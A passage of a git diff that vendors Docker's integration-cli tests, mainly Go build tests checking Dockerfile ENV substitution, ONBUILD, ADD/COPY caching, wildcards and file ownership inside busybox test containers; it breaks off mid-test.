s.d.Cmd("save", "-o", savedImagePath, "busybox") + c.Assert(err, check.IsNil, check.Commentf(out)) + out, err = s.d.Cmd("load", "--input", savedImagePath) + c.Assert(err, check.IsNil, check.Commentf(out)) + + exportedImagePath := filepath.Join(tmp, "export.tar") + + out, err = s.d.Cmd("run", "-d", "--name", "testexport", "busybox") + c.Assert(err, check.IsNil, check.Commentf(out)) + out, err = s.d.Cmd("export", "-o", exportedImagePath, "testexport") + c.Assert(err, check.IsNil, check.Commentf(out)) + out, err = s.d.Cmd("import", exportedImagePath) + 
c.Assert(err, check.IsNil, check.Commentf(out)) +} + +func (s *DockerAuthzSuite) TestAuthZPluginHeader(c *check.C) { + c.Assert(s.d.Start("--debug", "--authorization-plugin="+testAuthZPlugin), check.IsNil) + s.ctrl.reqRes.Allow = true + s.ctrl.resRes.Allow = true + c.Assert(s.d.LoadBusybox(), check.IsNil) + + daemonURL, err := url.Parse(s.d.sock()) + + conn, err := net.DialTimeout(daemonURL.Scheme, daemonURL.Path, time.Second*10) + c.Assert(err, check.IsNil) + client := httputil.NewClientConn(conn, nil) + req, err := http.NewRequest("GET", "/version", nil) + c.Assert(err, check.IsNil) + resp, err := client.Do(req) + + c.Assert(err, check.IsNil) + c.Assert(resp.Header["Content-Type"][0], checker.Equals, "application/json") +} + +// assertURIRecorded verifies that the given URI was sent and recorded in the authz plugin +func assertURIRecorded(c *check.C, uris []string, uri string) { + var found bool + for _, u := range uris { + if strings.Contains(u, uri) { + found = true + break + } + } + if !found { + c.Fatalf("Expected to find URI '%s', recorded uris '%s'", uri, strings.Join(uris, ",")) + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go new file mode 100644 index 0000000000..49c1062c25 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go @@ -0,0 +1,7392 @@ +package main + +import ( + "archive/tar" + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "reflect" + "regexp" + "runtime" + "strconv" + "strings" + "text/template" + "time" + + "github.com/docker/docker/builder/dockerfile/command" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/pkg/stringutils" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestBuildJSONEmptyRun(c *check.C) { + 
name := "testbuildjsonemptyrun" + + _, err := buildImage( + name, + ` + FROM busybox + RUN [] + `, + true) + + if err != nil { + c.Fatal("error when dealing with a RUN statement with empty JSON array") + } + +} + +func (s *DockerSuite) TestBuildShCmdJSONEntrypoint(c *check.C) { + name := "testbuildshcmdjsonentrypoint" + + _, err := buildImage( + name, + ` + FROM busybox + ENTRYPOINT ["echo"] + CMD echo test + `, + true) + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "run", "--rm", name) + + if daemonPlatform == "windows" { + if !strings.Contains(out, "cmd /S /C echo test") { + c.Fatalf("CMD did not contain cmd /S /C echo test : %q", out) + } + } else { + if strings.TrimSpace(out) != "/bin/sh -c echo test" { + c.Fatalf("CMD did not contain /bin/sh -c : %q", out) + } + } + +} + +func (s *DockerSuite) TestBuildEnvironmentReplacementUser(c *check.C) { + // Windows does not support FROM scratch or the USER command + testRequires(c, DaemonIsLinux) + name := "testbuildenvironmentreplacement" + + _, err := buildImage(name, ` + FROM scratch + ENV user foo + USER ${user} + `, true) + if err != nil { + c.Fatal(err) + } + + res := inspectFieldJSON(c, name, "Config.User") + + if res != `"foo"` { + c.Fatal("User foo from environment not in Config.User on image") + } + +} + +func (s *DockerSuite) TestBuildEnvironmentReplacementVolume(c *check.C) { + name := "testbuildenvironmentreplacement" + + var volumePath string + + if daemonPlatform == "windows" { + volumePath = "c:/quux" + } else { + volumePath = "/quux" + } + + _, err := buildImage(name, ` + FROM `+minimalBaseImage()+` + ENV volume `+volumePath+` + VOLUME ${volume} + `, true) + if err != nil { + c.Fatal(err) + } + + res := inspectFieldJSON(c, name, "Config.Volumes") + + var volumes map[string]interface{} + + if err := json.Unmarshal([]byte(res), &volumes); err != nil { + c.Fatal(err) + } + + if _, ok := volumes[volumePath]; !ok { + c.Fatal("Volume " + volumePath + " from environment not in Config.Volumes 
on image") + } + +} + +func (s *DockerSuite) TestBuildEnvironmentReplacementExpose(c *check.C) { + // Windows does not support FROM scratch or the EXPOSE command + testRequires(c, DaemonIsLinux) + name := "testbuildenvironmentreplacement" + + _, err := buildImage(name, ` + FROM scratch + ENV port 80 + EXPOSE ${port} + ENV ports " 99 100 " + EXPOSE ${ports} + `, true) + if err != nil { + c.Fatal(err) + } + + res := inspectFieldJSON(c, name, "Config.ExposedPorts") + + var exposedPorts map[string]interface{} + + if err := json.Unmarshal([]byte(res), &exposedPorts); err != nil { + c.Fatal(err) + } + + exp := []int{80, 99, 100} + + for _, p := range exp { + tmp := fmt.Sprintf("%d/tcp", p) + if _, ok := exposedPorts[tmp]; !ok { + c.Fatalf("Exposed port %d from environment not in Config.ExposedPorts on image", p) + } + } + +} + +func (s *DockerSuite) TestBuildEnvironmentReplacementWorkdir(c *check.C) { + name := "testbuildenvironmentreplacement" + + _, err := buildImage(name, ` + FROM busybox + ENV MYWORKDIR /work + RUN mkdir ${MYWORKDIR} + WORKDIR ${MYWORKDIR} + `, true) + + if err != nil { + c.Fatal(err) + } + +} + +func (s *DockerSuite) TestBuildEnvironmentReplacementAddCopy(c *check.C) { + name := "testbuildenvironmentreplacement" + + ctx, err := fakeContext(` + FROM `+minimalBaseImage()+` + ENV baz foo + ENV quux bar + ENV dot . 
+ ENV fee fff + ENV gee ggg + + ADD ${baz} ${dot} + COPY ${quux} ${dot} + ADD ${zzz:-${fee}} ${dot} + COPY ${zzz:-${gee}} ${dot} + `, + map[string]string{ + "foo": "test1", + "bar": "test2", + "fff": "test3", + "ggg": "test4", + }) + + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } + +} + +func (s *DockerSuite) TestBuildEnvironmentReplacementEnv(c *check.C) { + // ENV expansions work differently in Windows + testRequires(c, DaemonIsLinux) + name := "testbuildenvironmentreplacement" + + _, err := buildImage(name, + ` + FROM busybox + ENV foo zzz + ENV bar ${foo} + ENV abc1='$foo' + ENV env1=$foo env2=${foo} env3="$foo" env4="${foo}" + RUN [ "$abc1" = '$foo' ] && (echo "$abc1" | grep -q foo) + ENV abc2="\$foo" + RUN [ "$abc2" = '$foo' ] && (echo "$abc2" | grep -q foo) + ENV abc3 '$foo' + RUN [ "$abc3" = '$foo' ] && (echo "$abc3" | grep -q foo) + ENV abc4 "\$foo" + RUN [ "$abc4" = '$foo' ] && (echo "$abc4" | grep -q foo) + `, true) + + if err != nil { + c.Fatal(err) + } + + res := inspectFieldJSON(c, name, "Config.Env") + + envResult := []string{} + + if err = json.Unmarshal([]byte(res), &envResult); err != nil { + c.Fatal(err) + } + + found := false + envCount := 0 + + for _, env := range envResult { + parts := strings.SplitN(env, "=", 2) + if parts[0] == "bar" { + found = true + if parts[1] != "zzz" { + c.Fatalf("Could not find replaced var for env `bar`: got %q instead of `zzz`", parts[1]) + } + } else if strings.HasPrefix(parts[0], "env") { + envCount++ + if parts[1] != "zzz" { + c.Fatalf("%s should be 'foo' but instead its %q", parts[0], parts[1]) + } + } else if strings.HasPrefix(parts[0], "env") { + envCount++ + if parts[1] != "foo" { + c.Fatalf("%s should be 'foo' but instead its %q", parts[0], parts[1]) + } + } + } + + if !found { + c.Fatal("Never found the `bar` env variable") + } + + if envCount != 4 { + c.Fatalf("Didn't find all env vars - only saw %d\n%s", 
envCount, envResult) + } + +} + +func (s *DockerSuite) TestBuildHandleEscapes(c *check.C) { + // The volume paths used in this test are invalid on Windows + testRequires(c, DaemonIsLinux) + name := "testbuildhandleescapes" + + _, err := buildImage(name, + ` + FROM scratch + ENV FOO bar + VOLUME ${FOO} + `, true) + + if err != nil { + c.Fatal(err) + } + + var result map[string]map[string]struct{} + + res := inspectFieldJSON(c, name, "Config.Volumes") + + if err = json.Unmarshal([]byte(res), &result); err != nil { + c.Fatal(err) + } + + if _, ok := result["bar"]; !ok { + c.Fatalf("Could not find volume bar set from env foo in volumes table, got %q", result) + } + + deleteImages(name) + + _, err = buildImage(name, + ` + FROM scratch + ENV FOO bar + VOLUME \${FOO} + `, true) + + if err != nil { + c.Fatal(err) + } + + res = inspectFieldJSON(c, name, "Config.Volumes") + + if err = json.Unmarshal([]byte(res), &result); err != nil { + c.Fatal(err) + } + + if _, ok := result["${FOO}"]; !ok { + c.Fatalf("Could not find volume ${FOO} set from env foo in volumes table, got %q", result) + } + + deleteImages(name) + + // this test in particular provides *7* backslashes and expects 6 to come back. + // Like above, the first escape is swallowed and the rest are treated as + // literals, this one is just less obvious because of all the character noise. 
+ + _, err = buildImage(name, + ` + FROM scratch + ENV FOO bar + VOLUME \\\\\\\${FOO} + `, true) + + if err != nil { + c.Fatal(err) + } + + res = inspectFieldJSON(c, name, "Config.Volumes") + + if err = json.Unmarshal([]byte(res), &result); err != nil { + c.Fatal(err) + } + + if _, ok := result[`\\\${FOO}`]; !ok { + c.Fatalf(`Could not find volume \\\${FOO} set from env foo in volumes table, got %q`, result) + } + +} + +func (s *DockerSuite) TestBuildOnBuildLowercase(c *check.C) { + name := "testbuildonbuildlowercase" + name2 := "testbuildonbuildlowercase2" + + _, err := buildImage(name, + ` + FROM busybox + onbuild run echo quux + `, true) + + if err != nil { + c.Fatal(err) + } + + _, out, err := buildImageWithOut(name2, fmt.Sprintf(` + FROM %s + `, name), true) + + if err != nil { + c.Fatal(err) + } + + if !strings.Contains(out, "quux") { + c.Fatalf("Did not receive the expected echo text, got %s", out) + } + + if strings.Contains(out, "ONBUILD ONBUILD") { + c.Fatalf("Got an ONBUILD ONBUILD error with no error: got %s", out) + } + +} + +func (s *DockerSuite) TestBuildEnvEscapes(c *check.C) { + // ENV expansions work differently in Windows + testRequires(c, DaemonIsLinux) + name := "testbuildenvescapes" + _, err := buildImage(name, + ` + FROM busybox + ENV TEST foo + CMD echo \$ + `, + true) + + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "run", "-t", name) + + if strings.TrimSpace(out) != "$" { + c.Fatalf("Env TEST was not overwritten with bar when foo was supplied to dockerfile: was %q", strings.TrimSpace(out)) + } + +} + +func (s *DockerSuite) TestBuildEnvOverwrite(c *check.C) { + // ENV expansions work differently in Windows + testRequires(c, DaemonIsLinux) + name := "testbuildenvoverwrite" + + _, err := buildImage(name, + ` + FROM busybox + ENV TEST foo + CMD echo ${TEST} + `, + true) + + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "run", "-e", "TEST=bar", "-t", name) + + if strings.TrimSpace(out) != "bar" { + c.Fatalf("Env 
TEST was not overwritten with bar when foo was supplied to dockerfile: was %q", strings.TrimSpace(out)) + } + +} + +func (s *DockerSuite) TestBuildOnBuildCmdEntrypointJSON(c *check.C) { + name1 := "onbuildcmd" + name2 := "onbuildgenerated" + + _, err := buildImage(name1, ` +FROM busybox +ONBUILD CMD ["hello world"] +ONBUILD ENTRYPOINT ["echo"] +ONBUILD RUN ["true"]`, + false) + + if err != nil { + c.Fatal(err) + } + + _, err = buildImage(name2, fmt.Sprintf(`FROM %s`, name1), false) + + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "run", name2) + + if !regexp.MustCompile(`(?m)^hello world`).MatchString(out) { + c.Fatalf("did not get echo output from onbuild. Got: %q", out) + } + +} + +func (s *DockerSuite) TestBuildOnBuildEntrypointJSON(c *check.C) { + name1 := "onbuildcmd" + name2 := "onbuildgenerated" + + _, err := buildImage(name1, ` +FROM busybox +ONBUILD ENTRYPOINT ["echo"]`, + false) + + if err != nil { + c.Fatal(err) + } + + _, err = buildImage(name2, fmt.Sprintf("FROM %s\nCMD [\"hello world\"]\n", name1), false) + + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "run", name2) + + if !regexp.MustCompile(`(?m)^hello world`).MatchString(out) { + c.Fatal("got malformed output from onbuild", out) + } + +} + +func (s *DockerSuite) TestBuildCacheAdd(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows doesn't have httpserver image yet + name := "testbuildtwoimageswithadd" + server, err := fakeStorage(map[string]string{ + "robots.txt": "hello", + "index.html": "world", + }) + if err != nil { + c.Fatal(err) + } + defer server.Close() + + if _, err := buildImage(name, + fmt.Sprintf(`FROM scratch + ADD %s/robots.txt /`, server.URL()), + true); err != nil { + c.Fatal(err) + } + if err != nil { + c.Fatal(err) + } + deleteImages(name) + _, out, err := buildImageWithOut(name, + fmt.Sprintf(`FROM scratch + ADD %s/index.html /`, server.URL()), + true) + if err != nil { + c.Fatal(err) + } + if strings.Contains(out, "Using cache") { + 
c.Fatal("2nd build used cache on ADD, it shouldn't") + } + +} + +func (s *DockerSuite) TestBuildLastModified(c *check.C) { + name := "testbuildlastmodified" + + server, err := fakeStorage(map[string]string{ + "file": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer server.Close() + + var out, out2 string + + dFmt := `FROM busybox +ADD %s/file /` + + dockerfile := fmt.Sprintf(dFmt, server.URL()) + + if _, _, err = buildImageWithOut(name, dockerfile, false); err != nil { + c.Fatal(err) + } + + out, _ = dockerCmd(c, "run", name, "ls", "-le", "/file") + + // Build it again and make sure the mtime of the file didn't change. + // Wait a few seconds to make sure the time changed enough to notice + time.Sleep(2 * time.Second) + + if _, _, err = buildImageWithOut(name, dockerfile, false); err != nil { + c.Fatal(err) + } + out2, _ = dockerCmd(c, "run", name, "ls", "-le", "/file") + + if out != out2 { + c.Fatalf("MTime changed:\nOrigin:%s\nNew:%s", out, out2) + } + + // Now 'touch' the file and make sure the timestamp DID change this time + // Create a new fakeStorage instead of just using Add() to help windows + server, err = fakeStorage(map[string]string{ + "file": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer server.Close() + + dockerfile = fmt.Sprintf(dFmt, server.URL()) + + if _, _, err = buildImageWithOut(name, dockerfile, false); err != nil { + c.Fatal(err) + } + out2, _ = dockerCmd(c, "run", name, "ls", "-le", "/file") + + if out == out2 { + c.Fatalf("MTime didn't change:\nOrigin:%s\nNew:%s", out, out2) + } + +} + +// Regression for https://github.com/docker/docker/pull/27805 +// Makes sure that we don't use the cache if the contents of +// a file in a subfolder of the context is modified and we re-build. 
+func (s *DockerSuite) TestBuildModifyFileInFolder(c *check.C) { + name := "testbuildmodifyfileinfolder" + + ctx, err := fakeContext(`FROM busybox +RUN ["mkdir", "/test"] +ADD folder/file /test/changetarget`, + map[string]string{}) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + if err := ctx.Add("folder/file", "first"); err != nil { + c.Fatal(err) + } + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + if err := ctx.Add("folder/file", "second"); err != nil { + c.Fatal(err) + } + id2, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + if id1 == id2 { + c.Fatal("cache was used even though file contents in folder was changed") + } +} + +func (s *DockerSuite) TestBuildAddSingleFileToRoot(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testaddimg" + ctx, err := fakeContext(fmt.Sprintf(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN touch /exists +RUN chown dockerio.dockerio /exists +ADD test_file / +RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /test_file | awk '{print $1}') = '%s' ] +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod), + map[string]string{ + "test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +// Issue #3960: "ADD src ." 
hangs +func (s *DockerSuite) TestBuildAddSingleFileToWorkdir(c *check.C) { + name := "testaddsinglefiletoworkdir" + ctx, err := fakeContext(`FROM busybox +ADD test_file .`, + map[string]string{ + "test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + errChan := make(chan error) + go func() { + _, err := buildImageFromContext(name, ctx, true) + errChan <- err + close(errChan) + }() + select { + case <-time.After(15 * time.Second): + c.Fatal("Build with adding to workdir timed out") + case err := <-errChan: + c.Assert(err, check.IsNil) + } +} + +func (s *DockerSuite) TestBuildAddSingleFileToExistDir(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testaddsinglefiletoexistdir" + ctx, err := fakeContext(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN mkdir /exists +RUN touch /exists/exists_file +RUN chown -R dockerio.dockerio /exists +ADD test_file /exists/ +RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ] +RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, + map[string]string{ + "test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildCopyAddMultipleFiles(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + server, err := fakeStorage(map[string]string{ + "robots.txt": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer server.Close() + + name := "testcopymultiplefilestofile" + ctx, err := fakeContext(fmt.Sprintf(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN mkdir /exists +RUN touch /exists/exists_file +RUN chown -R dockerio.dockerio 
/exists +COPY test_file1 test_file2 /exists/ +ADD test_file3 test_file4 %s/robots.txt /exists/ +RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ] +RUN [ $(ls -l /exists/test_file1 | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /exists/test_file2 | awk '{print $3":"$4}') = 'root:root' ] + +RUN [ $(ls -l /exists/test_file3 | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /exists/test_file4 | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /exists/robots.txt | awk '{print $3":"$4}') = 'root:root' ] + +RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ] +`, server.URL()), + map[string]string{ + "test_file1": "test1", + "test_file2": "test2", + "test_file3": "test3", + "test_file4": "test4", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +// This test is mainly for user namespaces to verify that new directories +// are created as the remapped root uid/gid pair +func (s *DockerSuite) TestBuildAddToNewDestination(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testaddtonewdest" + ctx, err := fakeContext(`FROM busybox +ADD . 
/new_dir +RUN ls -l / +RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'root:root' ]`, + map[string]string{ + "test_dir/test_file": "test file", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +// This test is mainly for user namespaces to verify that new directories +// are created as the remapped root uid/gid pair +func (s *DockerSuite) TestBuildCopyToNewParentDirectory(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testcopytonewdir" + ctx, err := fakeContext(`FROM busybox +COPY test_dir /new_dir +RUN ls -l /new_dir +RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'root:root' ]`, + map[string]string{ + "test_dir/test_file": "test file", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +// This test is mainly for user namespaces to verify that new directories +// are created as the remapped root uid/gid pair +func (s *DockerSuite) TestBuildWorkdirIsContainerRoot(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testworkdirownership" + if _, err := buildImage(name, `FROM busybox +WORKDIR /new_dir +RUN ls -l / +RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'root:root' ]`, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildAddFileWithWhitespace(c *check.C) { + testRequires(c, DaemonIsLinux) // Not currently passing on Windows + name := "testaddfilewithwhitespace" + ctx, err := fakeContext(`FROM busybox +RUN mkdir "/test dir" +RUN mkdir "/test_dir" +ADD [ "test file1", "/test_file1" ] +ADD [ "test_file2", "/test file2" ] +ADD [ "test file3", "/test file3" ] +ADD [ "test dir/test_file4", "/test_dir/test_file4" ] +ADD [ "test_dir/test_file5", "/test dir/test_file5" ] +ADD [ "test dir/test_file6", "/test dir/test_file6" ] +RUN [ $(cat 
"/test_file1") = 'test1' ] +RUN [ $(cat "/test file2") = 'test2' ] +RUN [ $(cat "/test file3") = 'test3' ] +RUN [ $(cat "/test_dir/test_file4") = 'test4' ] +RUN [ $(cat "/test dir/test_file5") = 'test5' ] +RUN [ $(cat "/test dir/test_file6") = 'test6' ]`, + map[string]string{ + "test file1": "test1", + "test_file2": "test2", + "test file3": "test3", + "test dir/test_file4": "test4", + "test_dir/test_file5": "test5", + "test dir/test_file6": "test6", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildCopyFileWithWhitespace(c *check.C) { + dockerfile := `FROM busybox +RUN mkdir "/test dir" +RUN mkdir "/test_dir" +COPY [ "test file1", "/test_file1" ] +COPY [ "test_file2", "/test file2" ] +COPY [ "test file3", "/test file3" ] +COPY [ "test dir/test_file4", "/test_dir/test_file4" ] +COPY [ "test_dir/test_file5", "/test dir/test_file5" ] +COPY [ "test dir/test_file6", "/test dir/test_file6" ] +RUN [ $(cat "/test_file1") = 'test1' ] +RUN [ $(cat "/test file2") = 'test2' ] +RUN [ $(cat "/test file3") = 'test3' ] +RUN [ $(cat "/test_dir/test_file4") = 'test4' ] +RUN [ $(cat "/test dir/test_file5") = 'test5' ] +RUN [ $(cat "/test dir/test_file6") = 'test6' ]` + + if daemonPlatform == "windows" { + dockerfile = `FROM ` + WindowsBaseImage + ` +RUN mkdir "C:/test dir" +RUN mkdir "C:/test_dir" +COPY [ "test file1", "/test_file1" ] +COPY [ "test_file2", "/test file2" ] +COPY [ "test file3", "/test file3" ] +COPY [ "test dir/test_file4", "/test_dir/test_file4" ] +COPY [ "test_dir/test_file5", "/test dir/test_file5" ] +COPY [ "test dir/test_file6", "/test dir/test_file6" ] +RUN find "test1" "C:/test_file1" +RUN find "test2" "C:/test file2" +RUN find "test3" "C:/test file3" +RUN find "test4" "C:/test_dir/test_file4" +RUN find "test5" "C:/test dir/test_file5" +RUN find "test6" "C:/test dir/test_file6"` + } + + name := "testcopyfilewithwhitespace" + 
ctx, err := fakeContext(dockerfile, + map[string]string{ + "test file1": "test1", + "test_file2": "test2", + "test file3": "test3", + "test dir/test_file4": "test4", + "test_dir/test_file5": "test5", + "test dir/test_file6": "test6", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildCopyWildcard(c *check.C) { + name := "testcopywildcard" + server, err := fakeStorage(map[string]string{ + "robots.txt": "hello", + "index.html": "world", + }) + if err != nil { + c.Fatal(err) + } + defer server.Close() + + ctx, err := fakeContext(fmt.Sprintf(`FROM busybox + COPY file*.txt /tmp/ + RUN ls /tmp/file1.txt /tmp/file2.txt + RUN [ "mkdir", "/tmp1" ] + COPY dir* /tmp1/ + RUN ls /tmp1/dirt /tmp1/nested_file /tmp1/nested_dir/nest_nest_file + RUN [ "mkdir", "/tmp2" ] + ADD dir/*dir %s/robots.txt /tmp2/ + RUN ls /tmp2/nest_nest_file /tmp2/robots.txt + `, server.URL()), + map[string]string{ + "file1.txt": "test1", + "file2.txt": "test2", + "dir/nested_file": "nested file", + "dir/nested_dir/nest_nest_file": "2 times nested", + "dirt": "dirty", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + + // Now make sure we use a cache the 2nd time + id2, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + + if id1 != id2 { + c.Fatal("didn't use the cache") + } + +} + +func (s *DockerSuite) TestBuildCopyWildcardInName(c *check.C) { + name := "testcopywildcardinname" + ctx, err := fakeContext(`FROM busybox + COPY *.txt /tmp/ + RUN [ "$(cat /tmp/\*.txt)" = 'hi there' ] + `, map[string]string{"*.txt": "hi there"}) + + if err != nil { + // Normally we would do c.Fatal(err) here but given that + // the odds of this failing are so rare, it must be because + // the OS we're running the client on doesn't support * in + // 
filenames (like windows). So, instead of failing the test + // just let it pass. Then we don't need to explicitly + // say which OSs this works on or not. + return + } + defer ctx.Close() + + _, err = buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatalf("should have built: %q", err) + } +} + +func (s *DockerSuite) TestBuildCopyWildcardCache(c *check.C) { + name := "testcopywildcardcache" + ctx, err := fakeContext(`FROM busybox + COPY file1.txt /tmp/`, + map[string]string{ + "file1.txt": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + + // Now make sure we use a cache the 2nd time even with wild cards. + // Use the same context so the file is the same and the checksum will match + ctx.Add("Dockerfile", `FROM busybox + COPY file*.txt /tmp/`) + + id2, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + + if id1 != id2 { + c.Fatal("didn't use the cache") + } + +} + +func (s *DockerSuite) TestBuildAddSingleFileToNonExistingDir(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testaddsinglefiletononexistingdir" + ctx, err := fakeContext(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN touch /exists +RUN chown dockerio.dockerio /exists +ADD test_file /test_dir/ +RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, + map[string]string{ + "test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } + +} + +func (s *DockerSuite) TestBuildAddDirContentToRoot(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + 
name := "testadddircontenttoroot" + ctx, err := fakeContext(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN touch /exists +RUN chown dockerio.dockerio exists +ADD test_dir / +RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, + map[string]string{ + "test_dir/test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildAddDirContentToExistingDir(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testadddircontenttoexistingdir" + ctx, err := fakeContext(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN mkdir /exists +RUN touch /exists/exists_file +RUN chown -R dockerio.dockerio /exists +ADD test_dir/ /exists/ +RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ] +RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ] +RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ]`, + map[string]string{ + "test_dir/test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildAddWholeDirToRoot(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testaddwholedirtoroot" + ctx, err := fakeContext(fmt.Sprintf(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN touch /exists +RUN chown dockerio.dockerio exists +ADD test_dir /test_dir +RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l / | grep test_dir | awk 
